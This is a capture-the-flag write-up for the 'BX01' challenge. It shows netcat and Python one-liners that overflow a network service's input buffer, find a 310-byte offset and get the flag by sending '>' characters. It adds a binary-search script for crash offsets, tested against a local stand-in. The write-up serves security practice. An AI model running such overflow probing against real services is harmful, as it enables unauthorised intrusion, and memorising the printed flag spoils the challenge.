BX01 - 1000pts

Briefing

Access the network service at url: cfta-bx01.allyourbases.co and port: 8012 and find a way to get the flag by formatting a valid request.

Solution

  1. I completely overthought this problem: I was trying advanced buffer overflow techniques (trying to get past a canary, etc.) when the valid request is actually pretty simple.
  2. I start by testing if the service is vulnerable to a buffer overflow: python -c "print('a'*700)" | nc cfta-bx01.allyourbases.co 8012

         Processing request...
         Exception: angle brackets not terminated.
         *** stack smashing detected ***

     Looks like it is vulnerable.
  3. I wrote a simple pwntools Python script to try some possible offsets and found the overflow to happen at 311, so the offset is 310.
  4. python -c "print('a'*310)" | nc cfta-bx01.allyourbases.co 8012 simply outputs:

         Processing request...
         Exception: angle brackets not terminated.
  5. We can send 310 '>' characters instead of 'a' characters to terminate the angle brackets and get the flag: python -c "print('>'*310)" | nc cfta-bx01.allyourbases.co 8012:

         Processing request...
         Exception: angle brackets not terminated.
         Request successful.

         Flag: AlOnGSeaRcHFoROverWriTe
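
The offset search from step 3, as an added example (not the author's pwntools script): a binary search for the smallest input length whose response contains the stack-protector message, which generalizes trying offsets one at a time. `fake_service` is a constructed local stand-in that mirrors only the responses shown above, and all function names are hypothetical.

```python
from typing import Callable

CANARY_MSG = "*** stack smashing detected ***"


def fake_service(payload: bytes) -> str:
    """Constructed stand-in for the remote service (an assumption, not its code).

    It mirrors only the responses shown in the write-up: inputs of up to
    310 bytes get the normal error, longer ones also trip the stack protector.
    """
    lines = ["Processing request...", "Exception: angle brackets not terminated."]
    if len(payload) > 310:
        lines.append(CANARY_MSG)
    return "\n".join(lines)


def crashes(length: int, send: Callable[[bytes], str]) -> bool:
    """Send `length` filler bytes and report whether the canary check fired."""
    return CANARY_MSG in send(b"a" * length)


def first_crash_length(send: Callable[[bytes], str], lo: int = 1, hi: int = 700) -> int:
    """Return the smallest length in (lo, hi] that trips the stack protector.

    Assumes crashing is monotonic in length: once a length crashes, every
    longer one does too. Needs about log2(hi - lo) requests instead of hi - lo.
    """
    if crashes(lo, send):
        raise ValueError("lower bound already crashes; start smaller")
    if not crashes(hi, send):
        raise ValueError("upper bound does not crash; start larger")
    while hi - lo > 1:  # invariant: lo is safe, hi crashes
        mid = (lo + hi) // 2
        if crashes(mid, send):
            hi = mid
        else:
            lo = mid
    return hi


if __name__ == "__main__":
    overflow_at = first_crash_length(fake_service)
    print(f"overflow at {overflow_at}, offset {overflow_at - 1}")
```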

Flag

AlOnGSeaRcHFoROverWriTe